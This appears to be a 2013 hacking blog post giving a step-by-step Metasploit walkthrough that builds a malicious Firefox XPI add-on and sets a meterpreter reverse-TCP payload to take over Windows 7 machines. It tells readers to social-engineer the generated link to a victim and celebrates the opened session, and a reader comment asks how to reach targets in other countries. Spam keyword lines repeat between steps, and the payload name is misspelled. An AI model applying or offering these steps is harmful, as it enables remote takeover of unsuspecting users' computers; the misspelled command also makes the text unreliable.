Thursday, January 24, 2013

Hacking windows 7 with firefox addon

backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit


This exploit consistes in creating an xpi addon file . The victim 's browser (firefox) will pop up a dialog box asking the user if he trusts the addon. Once the user accept the addon installation, a payload with full user permission will be executed on the victim machine.
First, we are going to open the metasploit console:



root@bt:~# msfconsole




backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit


Now, we are going to use the mentioned exploit by typing:

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit




Let's se what is required for setting up the exploit:

msf > show options



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



We are going to choose "meterpreter" as our payload:


msf > set payload windows/meterpreter/revrese_tcp


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



Now, we have to set up our local ip, (you can run ifconfig to check what ip is yours)

msf > set lhost 192.168.1.2


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



Next, we sut up the address of the local machine:

msf > set srvhost 192.168.1.2



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



Now, we set the uripath; you can name it whatever you like:

msf > set uripath firefox boost



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit


Next, we choose our target by running this command:

msf > show targets



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



Since we are going to attack windows 7, we will choose the second option:


msf > set target 1


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit




Now, everything is ready for the attack

msf > exploit


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit



As you can see, a link has been generated for you, all what is left now, is to social engineer the link to a victim, and wait for a connection.

It seems a victim clicked on our link :-) 


backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit


Bingooo !! a meterpreter session has been opened




backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit




1 comment:

  1. sir is this for only local network can't we do it from different areas or countries??
    waiting for your reply..

    ReplyDelete